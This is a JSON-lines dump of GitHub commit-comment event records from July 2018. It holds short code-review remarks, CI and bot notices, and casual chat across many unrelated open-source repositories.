{"id":"7961803633","type":"CommitCommentEvent","actor":{"login":"hnes"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29699037,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T12:13:17Z","updated_at":"2018-07-13T12:13:17Z","author_association":"OWNER","body":"I just moved it into the dev branch.\r\nThank you very much for your advice ;)"}},"created_at":"2018-07-13T12:13:17Z"}
{"id":"7961804914","type":"CommitCommentEvent","actor":{"login":"yunusemre54"},"repo":{"name":"yunusemre54/denemeyunus54"},"payload":{"comment":{"id":29699041,"position":null,"line":null,"path":null,"commit_id":"7295ef9329aef235d58301034060a812c154506f","created_at":"2018-07-13T12:13:36Z","updated_at":"2018-07-13T12:13:36Z","author_association":"OWNER","body":"abı"}},"created_at":"2018-07-13T12:13:36Z"}
{"id":"7961806394","type":"CommitCommentEvent","actor":{"login":"birforce"},"repo":{"name":"birforce/vnpy_crypto"},"payload":{"comment":{"id":29699048,"position":44,"line":53,"path":"vnpy/trader/app/cmaStrategy/strategy/strategy45_coinArbitrage.py","commit_id":"0ccfe4eb18e0d23f691dde90bee7b4fe0119bb56","created_at":"2018-07-13T12:13:56Z","updated_at":"2018-07-13T12:13:56Z","author_association":"OWNER","body":"wrong \"j\" added."}},"created_at":"2018-07-13T12:13:56Z"}
{"id":"7961808724","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29699050,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T12:14:26Z","updated_at":"2018-07-13T12:14:26Z","author_association":"NONE","body":"159013173_Issue#6243 (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T12:14:26Z"}
{"id":"7961809325","type":"CommitCommentEvent","actor":{"login":"eskultety"},"repo":{"name":"skrtbhtngr/libvirt"},"payload":{"comment":{"id":29699053,"position":null,"line":null,"path":null,"commit_id":"76b989c55abd0cef0f3b2c99f9aca2057ed56441","created_at":"2018-07-13T12:14:35Z","updated_at":"2018-07-13T12:14:35Z","author_association":"NONE","body":"I didn't investigate further on this but if anything, it should be squashed into the previous patch where you're typedefing it"}},"created_at":"2018-07-13T12:14:35Z"}
{"id":"7961813252","type":"CommitCommentEvent","actor":{"login":"lazerl0rd"},"repo":{"name":"milouk/Sphinx-Kernel-Bullhead"},"payload":{"comment":{"id":29699063,"position":23,"line":232,"path":"kernel/power/process.c","commit_id":"d1a899535f6441e0a09594fca5dcb0c4202e0f69","created_at":"2018-07-13T12:15:31Z","updated_at":"2018-07-13T12:15:31Z","author_association":"CONTRIBUTOR","body":"lol hi guys"}},"created_at":"2018-07-13T12:15:31Z"}
{"id":"7961813706","type":"CommitCommentEvent","actor":{"login":"PavelKlevtsov"},"repo":{"name":"LINBIT/drbd-9.0"},"payload":{"comment":{"id":29699065,"position":17,"line":867,"path":"drbd/drbd_nl.c","commit_id":"6b3c69c40affc72ecfb542df05c4579a27a71659","created_at":"2018-07-13T12:15:38Z","updated_at":"2018-07-13T12:15:38Z","author_association":"NONE","body":"Looks good. Tests have passed. Thank you!"}},"created_at":"2018-07-13T12:15:38Z"}
{"id":"7961814472","type":"CommitCommentEvent","actor":{"login":"lazerl0rd"},"repo":{"name":"milouk/Sphinx-Kernel-Bullhead"},"payload":{"comment":{"id":29699067,"position":23,"line":232,"path":"kernel/power/process.c","commit_id":"d1a899535f6441e0a09594fca5dcb0c4202e0f69","created_at":"2018-07-13T12:15:48Z","updated_at":"2018-07-13T12:15:48Z","author_association":"CONTRIBUTOR","body":"all 3 active bullhead kernel devs in one chat lmao"}},"created_at":"2018-07-13T12:15:48Z"}
{"id":"7961815135","type":"CommitCommentEvent","actor":{"login":"trelau"},"repo":{"name":"Yixin-Hu/TetWild"},"payload":{"comment":{"id":29699069,"position":17,"line":205,"path":"src/SimpleTetrahedralization.cpp","commit_id":"c6919e2222cca4b91ec61b83ca07443e8ab18e9c","created_at":"2018-07-13T12:15:57Z","updated_at":"2018-07-13T12:15:57Z","author_association":"CONTRIBUTOR","body":"Can the `tmp_timer` be behind the `MUTE_COUT`? Seems like it only gets used to cout things?"}},"created_at":"2018-07-13T12:15:57Z"}
{"id":"7961815727","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29699070,"position":169,"line":302,"path":"modules/redisq/logqueue-redis.c","commit_id":"9d591dd1acda5c985d737230fab632356b8f48ac","created_at":"2018-07-13T12:16:06Z","updated_at":"2018-07-13T12:16:06Z","author_association":"MEMBER","body":"This value is always generated, but do not change during run-time. It would be perfectly fine to generate it at start up.\r\nA question to you: where should it be generated in the `new` or in the `init` ?"}},"created_at":"2018-07-13T12:16:06Z"}
{"id":"7961818806","type":"CommitCommentEvent","actor":{"login":"andrewhaines"},"repo":{"name":"cmager/carrierwave-azure"},"payload":{"comment":{"id":29699074,"position":null,"line":null,"path":null,"commit_id":"9eebe12d90022d5c0e501ec531bf0171e94931a2","created_at":"2018-07-13T12:16:51Z","updated_at":"2018-07-13T12:16:51Z","author_association":"NONE","body":"@cmager Thanks for doing this!"}},"created_at":"2018-07-13T12:16:51Z"}
{"id":"7961828984","type":"CommitCommentEvent","actor":{"login":"mrmorais"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29699104,"position":33,"line":43,"path":"local-cli/logAndroid/logAndroid.js","commit_id":"aba4ec0c0984caf3bec75a803080bd95722b35db","created_at":"2018-07-13T12:19:20Z","updated_at":"2018-07-13T12:19:20Z","author_association":"NONE","body":"The use of that comma is chashing apps running on node <= 8. I got a bunch of them at 7.10.1\r\nCan anyone confirm that?"}},"created_at":"2018-07-13T12:19:20Z"}
{"id":"7961829497","type":"CommitCommentEvent","actor":{"login":"birforce"},"repo":{"name":"birforce/vnpy_crypto"},"payload":{"comment":{"id":29699108,"position":638,"line":538,"path":"vnpy/trader/app/cmaStrategy/strategy/strategy45_coinArbitrage.py","commit_id":"0ccfe4eb18e0d23f691dde90bee7b4fe0119bb56","created_at":"2018-07-13T12:19:27Z","updated_at":"2018-07-13T12:19:27Z","author_association":"OWNER","body":","}},"created_at":"2018-07-13T12:19:27Z"}
{"id":"7961832945","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29699114,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T12:20:16Z","updated_at":"2018-07-13T12:20:16Z","author_association":"NONE","body":"Will [further development branches](https://git-scm.com/book/en/v2/Git-Branching-Branching-Workflows \"Git branching workflows\") evolve?"}},"created_at":"2018-07-13T12:20:16Z"}
{"id":"7961833478","type":"CommitCommentEvent","actor":{"login":"s15lkb"},"repo":{"name":"s15lkb/cavity-code"},"payload":{"comment":{"id":29699116,"position":null,"line":null,"path":null,"commit_id":"17f7540da817efaf33314aa1d560eb5b02228923","created_at":"2018-07-13T12:20:23Z","updated_at":"2018-07-13T12:20:23Z","author_association":"OWNER","body":"Killer généré automatiquement"}},"created_at":"2018-07-13T12:20:23Z"}
{"id":"7961836007","type":"CommitCommentEvent","actor":{"login":"agammkrawczyk"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29699125,"position":23,"line":16,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"7d7e9762a6daa95db50e0b5805825e4d881327f4","created_at":"2018-07-13T12:20:58Z","updated_at":"2018-07-13T12:20:58Z","author_association":"OWNER","body":"Zmienialiśmy to przecież  na localdate -20 i w intelij mam poprawnie w main\n...\n\npt., 13 lip 2018, 13:55 użytkownik Pawel Pluta <notifications@github.com>\nnapisał:\n\n> Nie można porównywać z rokiem 1998. Jeśli data się zmieni np będzie rok\n> 2020, wynik będzie błędny\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/agammkrawczyk/agnieszkakrawczyk/commit/7d7e9762a6daa95db50e0b5805825e4d881327f4#commitcomment-29698865>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AkzhzKOC8uz9Nn3_0YuZXw1Ucyd615zIks5uGIqbgaJpZM4VOxTX>\n> .\n>\n"}},"created_at":"2018-07-13T12:20:58Z"}
{"id":"7961840361","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"agammkrawczyk/agnieszkakrawczyk"},"payload":{"comment":{"id":29699135,"position":23,"line":16,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"7d7e9762a6daa95db50e0b5805825e4d881327f4","created_at":"2018-07-13T12:22:00Z","updated_at":"2018-07-13T12:22:00Z","author_association":"NONE","body":"Hmm, to widocznie w tym commicie tego nie ma\n\npt., 13 lip 2018 o 14:21 agammkrawczyk <notifications@github.com>\nnapisał(a):\n\n> Zmienialiśmy to przecież na localdate -20 i w intelij mam poprawnie w main\n> ...\n>\n> pt., 13 lip 2018, 13:55 użytkownik Pawel Pluta <notifications@github.com>\n> napisał:\n>\n> > Nie można porównywać z rokiem 1998. Jeśli data się zmieni np będzie rok\n> > 2020, wynik będzie błędny\n> >\n> > —\n> > You are receiving this because you authored the thread.\n> > Reply to this email directly, view it on GitHub\n> > <\n> https://github.com/agammkrawczyk/agnieszkakrawczyk/commit/7d7e9762a6daa95db50e0b5805825e4d881327f4#commitcomment-29698865\n> >,\n> > or mute the thread\n> > <\n> https://github.com/notifications/unsubscribe-auth/AkzhzKOC8uz9Nn3_0YuZXw1Ucyd615zIks5uGIqbgaJpZM4VOxTX\n> >\n> > .\n> >\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/agammkrawczyk/agnieszkakrawczyk/commit/7d7e9762a6daa95db50e0b5805825e4d881327f4#commitcomment-29699125>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AJ9KJ7vOgYOCC2k3Maznqu8ofrdKcT4Gks5uGJCtgaJpZM4VOxTX>\n> .\n>\n"}},"created_at":"2018-07-13T12:22:00Z"}
{"id":"7961842370","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29699141,"position":62,"line":121,"path":"modules/redisq/logqueue-redis.c","commit_id":"9d591dd1acda5c985d737230fab632356b8f48ac","created_at":"2018-07-13T12:22:28Z","updated_at":"2018-07-13T12:22:28Z","author_association":"MEMBER","body":"Please if possible avoid condition without curly brackets. "}},"created_at":"2018-07-13T12:22:28Z"}
{"id":"7961873320","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29699188,"position":60,"line":93,"path":"modules/redisq/logqueue-redis.c","commit_id":"e70ba90223ce22f756ed2938540d4d69fb63a534","created_at":"2018-07-13T12:29:24Z","updated_at":"2018-07-13T12:29:24Z","author_association":"MEMBER","body":"The boolean argument could be confusing sometimes, and actually the mean two different behavior. It worth considering to make two distinct function from them, like in this case: `redis_dp_connect` and `redis_dp_reconnect` (if both of them needed at all.)"}},"created_at":"2018-07-13T12:29:24Z"}
{"id":"7961874174","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29699190,"position":null,"line":null,"path":null,"commit_id":"08c89334221775402c6c4526ce66bc1e2d126eba","created_at":"2018-07-13T12:29:35Z","updated_at":"2018-07-13T12:29:35Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-13T12:29:35Z"}
{"id":"7961874666","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29699192,"position":null,"line":null,"path":null,"commit_id":"abc9b45eeba10300f5214b6651b308434eb36360","created_at":"2018-07-13T12:29:41Z","updated_at":"2018-07-13T12:29:41Z","author_association":"COLLABORATOR","body":"Puzzle `54-015f6299` disappeared from [`zold/score.py`](https://github.com/DronMDF/zold-lazy-node/blob/master/zold/score.py), that's why I closed #64. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-13T12:29:41Z"}
{"id":"7961874818","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29699193,"position":null,"line":null,"path":null,"commit_id":"abc9b45eeba10300f5214b6651b308434eb36360","created_at":"2018-07-13T12:29:43Z","updated_at":"2018-07-13T12:29:43Z","author_association":"COLLABORATOR","body":"Puzzle `68-590df329` discovered in   [`node/app.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/node/app.py)   and submitted as #72. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-13T12:29:43Z"}
{"id":"7961874854","type":"CommitCommentEvent","actor":{"login":"evanhammer"},"repo":{"name":"zhammer/playlist-souffle"},"payload":{"comment":{"id":29699194,"position":7,"line":7,"path":"web_client/src/components/withLoading.js","commit_id":"4c9115130b26ccbe2b4586bf5bd9dd20d3c14323","created_at":"2018-07-13T12:29:43Z","updated_at":"2018-07-13T12:29:43Z","author_association":"COLLABORATOR","body":"i like this better. Though something is still off about it to me. I like that the reducers are controlling application state. Maybe this is cool."}},"created_at":"2018-07-13T12:29:43Z"}
{"id":"7961874914","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"DronMDF/zold-lazy-node"},"payload":{"comment":{"id":29699195,"position":null,"line":null,"path":null,"commit_id":"abc9b45eeba10300f5214b6651b308434eb36360","created_at":"2018-07-13T12:29:44Z","updated_at":"2018-07-13T12:29:44Z","author_association":"COLLABORATOR","body":"Puzzle `68-c8d6556c` discovered in   [`zold/score.py`](  https://github.com/DronMDF/zold-lazy-node/blob/master/zold/score.py)   and submitted as #73. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-13T12:29:44Z"}
{"id":"7961875721","type":"CommitCommentEvent","actor":{"login":"JessicaLavender"},"repo":{"name":"JessicaLavender/Hello-World"},"payload":{"comment":{"id":29699197,"position":null,"line":null,"path":null,"commit_id":"1f34cba20788628f0dd5b486ff142fdb70bed118","created_at":"2018-07-13T12:29:56Z","updated_at":"2018-07-13T12:29:56Z","author_association":"OWNER","body":"correct the spelling error to 'programing'"}},"created_at":"2018-07-13T12:29:56Z"}
{"id":"7961875884","type":"CommitCommentEvent","actor":{"login":"Kokan"},"repo":{"name":"balabit/syslog-ng"},"payload":{"comment":{"id":29699198,"position":68,"line":101,"path":"modules/redisq/logqueue-redis.c","commit_id":"e70ba90223ce22f756ed2938540d4d69fb63a534","created_at":"2018-07-13T12:29:58Z","updated_at":"2018-07-13T12:29:58Z","author_association":"MEMBER","body":"This part is actually the same as calling `check_connection_to_redis` so that should be preferred."}},"created_at":"2018-07-13T12:29:58Z"}
{"id":"7961877785","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29699205,"position":null,"line":null,"path":null,"commit_id":"ad5b8883142952c89eb3e68500cd5e5399950e54","created_at":"2018-07-13T12:30:20Z","updated_at":"2018-07-13T12:30:20Z","author_association":"NONE","body":"Congrats!"}},"created_at":"2018-07-13T12:30:20Z"}
{"id":"7961881124","type":"CommitCommentEvent","actor":{"login":"khlevnov"},"repo":{"name":"metlin/empty_project"},"payload":{"comment":{"id":29699208,"position":4,"line":3,"path":"src/main/java/ru/metlin/empty_project/organization/OrganizationController.java","commit_id":"c25eb614de0fd47358f66e851336c3b5bcb8be1f","created_at":"2018-07-13T12:30:59Z","updated_at":"2018-07-13T12:30:59Z","author_association":"NONE","body":"Импорти аннотации по одной. Для этого в идее File / Settings / Editor / Code style / Java есть поля\r\n*Class count to use import with* * -- 999\r\n*Names count to use static import with* * -- 999"}},"created_at":"2018-07-13T12:30:59Z"}
{"id":"7961887936","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29699226,"position":null,"line":null,"path":null,"commit_id":"7290791cc1a2ee81ee04c3f85e6c16fe2b32fef6","created_at":"2018-07-13T12:32:28Z","updated_at":"2018-07-13T12:32:28Z","author_association":"NONE","body":"I suggest then to give desired branches clearer names."}},"created_at":"2018-07-13T12:32:28Z"}
{"id":"7961889855","type":"CommitCommentEvent","actor":{"login":"khlevnov"},"repo":{"name":"metlin/empty_project"},"payload":{"comment":{"id":29699234,"position":3,"line":3,"path":"src/main/java/ru/metlin/empty_project/office/OfficeController.java","commit_id":"fdb5f48c741d456d5024b066ea6245627597cb3d","created_at":"2018-07-13T12:32:55Z","updated_at":"2018-07-13T12:32:55Z","author_association":"NONE","body":"Тоже импорт со звездочкой"}},"created_at":"2018-07-13T12:32:55Z"}
{"id":"7961890521","type":"CommitCommentEvent","actor":{"login":"milouk"},"repo":{"name":"milouk/Sphinx-Kernel-Bullhead"},"payload":{"comment":{"id":29699236,"position":23,"line":232,"path":"kernel/power/process.c","commit_id":"d1a899535f6441e0a09594fca5dcb0c4202e0f69","created_at":"2018-07-13T12:33:05Z","updated_at":"2018-07-13T12:33:05Z","author_association":"OWNER","body":"@lazerl0rd  hahahaha hi mate! nice to see you here :D "}},"created_at":"2018-07-13T12:33:05Z"}
{"id":"7961894710","type":"CommitCommentEvent","actor":{"login":"accuminium"},"repo":{"name":"pulp-platform/style-guidelines"},"payload":{"comment":{"id":29699245,"position":54,"line":93,"path":"README.md","commit_id":"19f16281a889ebeffdfd4aea381a6026408c3d2a","created_at":"2018-07-13T12:33:59Z","updated_at":"2018-07-13T12:33:59Z","author_association":"MEMBER","body":"Thanks for the clarification, Frank!  Please let me/us know when we can help with any of this."}},"created_at":"2018-07-13T12:33:59Z"}
{"id":"7961895503","type":"CommitCommentEvent","actor":{"login":"dm4uz3"},"repo":{"name":"ToppleKek/rhythmbox-discord"},"payload":{"comment":{"id":29699248,"position":null,"line":null,"path":null,"commit_id":"1e62f6434f029949ba459255516bf3565e7574ed","created_at":"2018-07-13T12:34:11Z","updated_at":"2018-07-13T12:34:11Z","author_association":"CONTRIBUTOR","body":"lol just delet it"}},"created_at":"2018-07-13T12:34:11Z"}
{"id":"7961902572","type":"CommitCommentEvent","actor":{"login":"sormuras"},"repo":{"name":"forax/pro"},"payload":{"comment":{"id":29699261,"position":7,"line":39,"path":"plugins/tester/src/main/java/com.github.forax.pro.plugin.tester/com/github/forax/pro/plugin/tester/TesterRunner.java","commit_id":"c404529c767c719c07523eeb80fea0c53776660f","created_at":"2018-07-13T12:35:42Z","updated_at":"2018-07-13T12:35:42Z","author_association":"COLLABORATOR","body":"So, for what did you use the `selectPackage(...)` then?\r\n\r\nRegarding tags: sure. Creating an issue for it."}},"created_at":"2018-07-13T12:35:42Z"}
{"id":"7961909552","type":"CommitCommentEvent","actor":{"login":"oyvindln"},"repo":{"name":"Frommi/miniz_oxide"},"payload":{"comment":{"id":29699272,"position":null,"line":null,"path":null,"commit_id":"a40d7511edc3776fd0fc7fb49611df009db1fa67","created_at":"2018-07-13T12:37:16Z","updated_at":"2018-07-13T12:37:16Z","author_association":"COLLABORATOR","body":"@Frommi Do we want to do a major version bump on this as it is technically an API change, or should we not bother, as this is very unlikely to break anything and a github search doesn't reveal it being used by anyone."}},"created_at":"2018-07-13T12:37:16Z"}
{"id":"7961917350","type":"CommitCommentEvent","actor":{"login":"renatosaliu"},"repo":{"name":"oruda15/BarManagementSystem"},"payload":{"comment":{"id":29699289,"position":null,"line":null,"path":null,"commit_id":"913627ca8afa6ee725d570d684bc106e8802cffb","created_at":"2018-07-13T12:39:04Z","updated_at":"2018-07-13T12:39:04Z","author_association":"COLLABORATOR","body":"Bravo Cuna !"}},"created_at":"2018-07-13T12:39:04Z"}
{"id":"7961921083","type":"CommitCommentEvent","actor":{"login":"mwl"},"repo":{"name":"humio/docs.humio.com"},"payload":{"comment":{"id":29699297,"position":5,"line":30,"path":"content/language-syntax/_index.md","commit_id":"9282cf21c19b4fd9a989563c64b914ec0e7371ab","created_at":"2018-07-13T12:39:55Z","updated_at":"2018-07-13T12:39:55Z","author_association":"CONTRIBUTOR","body":"@chvitved Intentional `f` there?"}},"created_at":"2018-07-13T12:39:55Z"}
{"id":"7961924600","type":"CommitCommentEvent","actor":{"login":"Phi-Van-Lam"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29699309,"position":null,"line":null,"path":null,"commit_id":"63f04777162181798399a2c4e5436d0d0c16291b","created_at":"2018-07-13T12:40:40Z","updated_at":"2018-07-13T12:40:40Z","author_association":"NONE","body":"I read your lib about max30100.c but I am not good for a programme.\r\nCould you help me make a basic program on it by using Raspberry Pi?\r\nThank you very much!"}},"created_at":"2018-07-13T12:40:40Z"}
{"id":"7961926865","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29699314,"position":null,"line":null,"path":null,"commit_id":"361bf54d9812bdae5ab2a726f01c4bd5c3a71c2d","created_at":"2018-07-13T12:41:10Z","updated_at":"2018-07-13T12:41:10Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-13T12:41:10Z"}
{"id":"7961935824","type":"CommitCommentEvent","actor":{"login":"ricardograca"},"repo":{"name":"tgriesser/knex"},"payload":{"comment":{"id":29699331,"position":null,"line":null,"path":null,"commit_id":"3aa811fa9d686515fb5b374f2c86d707425f62b4","created_at":"2018-07-13T12:43:05Z","updated_at":"2018-07-13T12:43:05Z","author_association":"COLLABORATOR","body":"@elhigu I'd say that should probably be another task since `test` is supposed to \"just work\" and what you describe seems like a special use case."}},"created_at":"2018-07-13T12:43:05Z"}
{"id":"7961937851","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29699337,"position":null,"line":null,"path":null,"commit_id":"0b1d186aeba7929b78d2bc2f2fd622f8c319efed","created_at":"2018-07-13T12:43:30Z","updated_at":"2018-07-13T12:43:30Z","author_association":"OWNER","body":"The above method is a way to retrieve a file from the cache storage\r\nin this code snippet, we tried to retrieve the app.js file\r\nHOW?\r\nwe set up the fetch event listener and look for the resource needed to be fetched in the cache storage first.\r\nThe event.respondWith() will return either the response found in the cache, if the file is present there or simply return the fetch request with the original response.\r\nthe caches.match() promise will compare the given request with the request stored in the cache. REMEMBER, the url we used while storing the file in the cache is not the url but rather a KEY which is used her to retrieve the value, that is the contents of the key, that is the contents of the file app.js\r\n\r\nHOW TO VERIFY?\r\ngo to developer tools and watch out in the network section about the app.js file, it will show retrieved from service-worker. This is the proof that we have been successful in retrieving the file from the cache, however the app at this point wont be available as we haven't cached the index.html pages, ie. the APP SHELL"}},"created_at":"2018-07-13T12:43:30Z"}
{"id":"7961938025","type":"CommitCommentEvent","actor":{"login":"lyoungblood"},"repo":{"name":"tacoinfra/remote-signer"},"payload":{"comment":{"id":29699339,"position":null,"line":null,"path":null,"commit_id":"88724fbeedb099fbd8005c7ec8efc5a8304ac38a","created_at":"2018-07-13T12:43:32Z","updated_at":"2018-07-13T12:43:32Z","author_association":"CONTRIBUTOR","body":"Endorsements were only disabled to prevent Tezos Foundation bakers from drawing down to a 0 balance due to the cost of deposits in the first 6 cycles.  Endorsements have now been disabled on all of the bakers by stopping the endorsement clients.  They will be reenabled before cycle 7."}},"created_at":"2018-07-13T12:43:32Z"}
{"id":"7961950945","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29699379,"position":41,"line":41,"path":".travis.yml","commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T12:46:16Z","updated_at":"2018-07-13T12:46:16Z","author_association":"NONE","body":"@groved-oss will have to re-encrypt this (when we adopt into apache)."}},"created_at":"2018-07-13T12:46:16Z"}
{"id":"7961951316","type":"CommitCommentEvent","actor":{"login":"vrlink"},"repo":{"name":"EOSVR/EOSVR"},"payload":{"comment":{"id":29699381,"position":null,"line":null,"path":null,"commit_id":"b624c8aeb4b8b866d73452c7358c0ddbc99ac34a","created_at":"2018-07-13T12:46:21Z","updated_at":"2018-07-13T12:46:21Z","author_association":"NONE","body":"iq 使用的并不是标准的eos代币合约（eosio.token），所以用系统默认的转账方式转账会失败"}},"created_at":"2018-07-13T12:46:21Z"}
{"id":"7961953171","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29699385,"position":34,"line":34,"path":"tools/travis/publish.sh","commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T12:46:46Z","updated_at":"2018-07-13T12:46:46Z","author_association":"NONE","body":"this is wrong and you only have one version."}},"created_at":"2018-07-13T12:46:46Z"}
{"id":"7961954630","type":"CommitCommentEvent","actor":{"login":"rabbah"},"repo":{"name":"remore/openwhisk-runtime-ruby"},"payload":{"comment":{"id":29699388,"position":null,"line":null,"path":null,"commit_id":"1bef0b30121e03e9ac496682b895f41677443271","created_at":"2018-07-13T12:47:06Z","updated_at":"2018-07-13T12:47:06Z","author_association":"NONE","body":"couple of bugs in here - thanks for doing that."}},"created_at":"2018-07-13T12:47:06Z"}
{"id":"7961956155","type":"CommitCommentEvent","actor":{"login":"Neeeeta"},"repo":{"name":"Neeeeta/hello-world"},"payload":{"comment":{"id":29699390,"position":null,"line":null,"path":null,"commit_id":"372bc758cd08a84adf0cb68322ef5d8d344f6941","created_at":"2018-07-13T12:47:27Z","updated_at":"2018-07-13T12:47:27Z","author_association":"OWNER","body":"first program"}},"created_at":"2018-07-13T12:47:27Z"}
{"id":"7961960038","type":"CommitCommentEvent","actor":{"login":"theZaki"},"repo":{"name":"OussaZaki/smartcoding-password"},"payload":{"comment":{"id":29699402,"position":13,"line":16,"path":"main.html","commit_id":"3a15eb4f326aecb78163146ac941d5671d3ffb11","created_at":"2018-07-13T12:48:16Z","updated_at":"2018-07-13T12:48:16Z","author_association":"NONE","body":"1- Why do you have ids on pinCode and passwordGenerator?\r\n\r\n2- pinCode is not done yet?"}},"created_at":"2018-07-13T12:48:16Z"}
{"id":"7961962998","type":"CommitCommentEvent","actor":{"login":"theZaki"},"repo":{"name":"OussaZaki/smartcoding-password"},"payload":{"comment":{"id":29699405,"position":4,"line":18,"path":"passwordGenerator.html","commit_id":"3a15eb4f326aecb78163146ac941d5671d3ffb11","created_at":"2018-07-13T12:48:53Z","updated_at":"2018-07-13T12:48:53Z","author_association":"NONE","body":"Why did you add bundle.js here? "}},"created_at":"2018-07-13T12:48:53Z"}
{"id":"7961966896","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29699411,"position":null,"line":null,"path":null,"commit_id":"d3d8aaf344274bcc5ce2d71e2103b8ab5c888bf8","created_at":"2018-07-13T12:49:41Z","updated_at":"2018-07-13T12:49:41Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#dev](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#dev).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://dev-next50.pantheonsite.io/)"}},"created_at":"2018-07-13T12:49:41Z"}
{"id":"7961970492","type":"CommitCommentEvent","actor":{"login":"dschaper"},"repo":{"name":"probot/dco"},"payload":{"comment":{"id":29699417,"position":2,"line":2,"path":"test/index.test.js","commit_id":"b752d5d5e01afb9e7c1d1824f265b466928f04b7","created_at":"2018-07-13T12:50:25Z","updated_at":"2018-07-13T12:50:25Z","author_association":"NONE","body":"Looks like you have a merge conflict that was not fully resolved?"}},"created_at":"2018-07-13T12:50:25Z"}
{"id":"7961975076","type":"CommitCommentEvent","actor":{"login":"rosik"},"repo":{"name":"tarantool/tarantool"},"payload":{"comment":{"id":29699424,"position":5,"line":225,"path":"src/lua/init.c","commit_id":"c0b9b7681a21a06339a3e3b5e183597951a810d6","created_at":"2018-07-13T12:51:24Z","updated_at":"2018-07-13T12:51:24Z","author_association":"NONE","body":"I think you need `if (result > -1 * (unsigned long long)LLONG_MIN)`"}},"created_at":"2018-07-13T12:51:24Z"}
